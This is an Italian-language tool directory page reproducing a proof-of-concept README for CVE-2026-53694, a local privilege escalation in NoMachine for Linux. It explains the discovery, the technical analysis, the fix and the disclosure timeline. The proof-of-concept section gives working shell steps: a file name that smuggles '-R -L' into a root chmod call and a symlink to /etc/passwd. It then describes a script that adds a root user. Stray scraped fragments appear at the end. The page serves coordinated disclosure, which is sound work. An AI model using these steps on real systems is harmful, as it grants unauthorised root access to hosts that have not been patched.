Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-53694-NoMachine-LPE — Prova di concetto e analisi per CVE-2026-53694, un'escalation dei privilegi locali in NoMachine per Linux tramite iniezione di argomenti in nxchmod.sh, che consente l'accesso root attraverso la manipolazione di symlink. | Kitploit
Strumenti/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

Prova di concetto e analisi per CVE-2026-53694, un'escalation dei privilegi locali in NoMachine per Linux tramite iniezione di argomenti in nxchmod.sh, che consente l'accesso root attraverso la manipolazione di symlink.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
12 mesi faNon ancora revisionato

CVE-2026-53694: Escalata dei Privilegi Locali in NoMachine tramite Iniezione di Argomenti

CVE Status Target Language

Panoramica

Questo repository contiene la documentazione e la Prova di Concetto (PoC) per CVE-2026-53694, una vulnerabilità di Escalata dei Privilegi Locali (LPE) in NoMachine per Linux.

A causa di una neutralizzazione impropria dei delimitatori di argomento nello script nxchmod.sh, un utente locale non privilegiato può iniettare argomenti in un comando di sistema eseguito come root. Combinando questa iniezione di argomenti con un collegamento simbolico, un attaccante può sovrascrivere file critici di sistema (come /etc/passwd) e aumentare i propri privilegi a root.

Questa vulnerabilità è stata completamente corretta dal fornitore.

Il Processo di Scoperta

Trovare questa vulnerabilità è stato un processo di tentativi, errori e una realizzazione notturna. Ecco come si è svolta la scoperta:

  1. Osservando il Target: Ho notato che lo script /usr/NX/scripts/restricted/nxchmod.sh veniva eseguito periodicamente dall'utente root per gestire i permessi in directory specifiche.
  2. Idea Iniziale (Il Vicolo Cieco): Ho visto che lo script applicava chmod a+rw ai file. Ho pensato: Se controllo la destinazione, posso usare un symlink per rendere scrivibile /etc/passwd? Ho testato un symlink standard (ln -s /etc/passwd /tmp/asdf), ma ha fallito. Il sticky bit di Linux sulle directory come /tmp impedisce all'utente root di seguire ciecamente un symlink creato da un altro utente.
  3. La Svolta: Mentre esaminavo successivamente l'esecuzione dello script, ho notato come veniva costruito il comando: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. Lo script prendeva il nome del file così com'è e lo passava direttamente a chmod.
  4. Iniezione di Comandi tramite Nome File: Ho realizzato di poter creare un file con spazi e flag nel nome. Ho creato un file chiamato X1234 -R -L. Quando lo script veniva eseguito, il comando chmod espandeva questo in argomenti invece che in un singolo percorso file.
  5. Bypass del Sticky Bit: Iniettando i flag (segui i symlink) e (ricorsivo) nel comando tramite il nome del file, ho forzato il binario stesso a risolvere e seguire il symlink che avevo creato nella directory, bypassando completamente la protezione dello sticky bit.

Analisi Tecnica

La vulnerabilità deriva da come NoMachine gestisce i permessi per i socket X11/Wayland. Lo script nxchmod.sh viene avviato dal demone nxserver.bin in esecuzione come root.

L'esecuzione vulnerabile si presenta così:

root@kitploit:~
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

Se un attaccante crea una struttura di directory e un file chiamato X1234 -R -L, il comando risultante eseguito da root diventa: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

Quando un symlink che punta a /etc/passwd viene posizionato all'interno della directory X1234, gli argomenti iniettati -R e -L costringono chmod a seguire ricorsivamente il symlink e a concedere permessi di lettura/scrittura globali al file di destinazione.

Requisiti per lo Sfruttamento

Affinché questo exploit funzioni, il sistema di destinazione deve soddisfare le seguenti condizioni:

  • Il sistema operativo deve utilizzare Wayland (non X11).
  • Xwayland deve essere attivo.
  • Deve essere in esecuzione una sessione grafica (la schermata di login è sufficiente).

Prova di Concetto

Puoi riprodurre questa vulnerabilità manualmente usando comandi shell oppure automaticamente usando lo script Python fornito.

Metodo 1: Esecuzione Manuale (Shell)

Naviga in /tmp/.X11-unix/ ed esegui i seguenti comandi per creare la struttura di directory malevola.

root@kitploit:~
cd /tmp/.X11-unix/

# 1. Impostazione dello sfruttamento
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Attendere l'esecuzione di nxchmod.sh (può richiedere fino a 60 secondi).
# Verificare che i permessi di /etc/passwd siano cambiati in -rw-rw-rw-
# Ora puoi modificare /etc/passwd per aggiungere un utente root.

Una volta verificata la vulnerabilità e ottenuti i privilegi, esegui i seguenti comandi di pulizia per ripristinare la stabilità del sistema e rimuovere gli artefatti:

root@kitploit:~
# 2. Pulizia
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

Metodo 2: Exploit Automatico

Un exploit automatico completo è fornito in poc.py. Questo script verifica i requisiti di Wayland, imposta il symlink, attende il ciclo di esecuzione di nxchmod.sh e inietta un nuovo utente root (gg) in /etc/passwd

Per eseguire l'exploit:

root@kitploit:~
python3 poc.py

Rimedio

Questa vulnerabilità è stata risolta da NoMachine. Gli utenti dovrebbero aggiornare alle seguenti versioni o successive:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

Cronologia

  • 2026-04-20: Vulnerabilità segnalata al fornitore.
  • 2026-04-23: Fornitore ha confermato la vulnerabilità e concordato una divulgazione coordinata.
  • 2026-05-07: Fornitore ha rilasciato versioni corrette (9.5.7 e 8.23.2) e pubblicato il Trouble Report TR04X11802.
  • 2026-06-10: CVE-2026-53694 pubblicato su NVD. (Il record ufficiale MITRE è attualmente in attesa di analisi completa e aggiornamenti dei crediti (ultimo controllo 2026-07-01))

Riferimenti

  • NoMachine Trouble Report TR04X11802
  • NoMachine Software Update SU05X00274
  • NoMachine Software Update SU05X00275
  • NVD - CVE-2026-53694
Scarica lo strumento
-L
-R
chmod
chmod
  • Raggiungimento dell'LPE: Una volta che /etc/passwd è stato reso scrivibile (a+rw), ho potuto semplicemente aggiungere un nuovo utente root al file ed eseguire su per accedervi.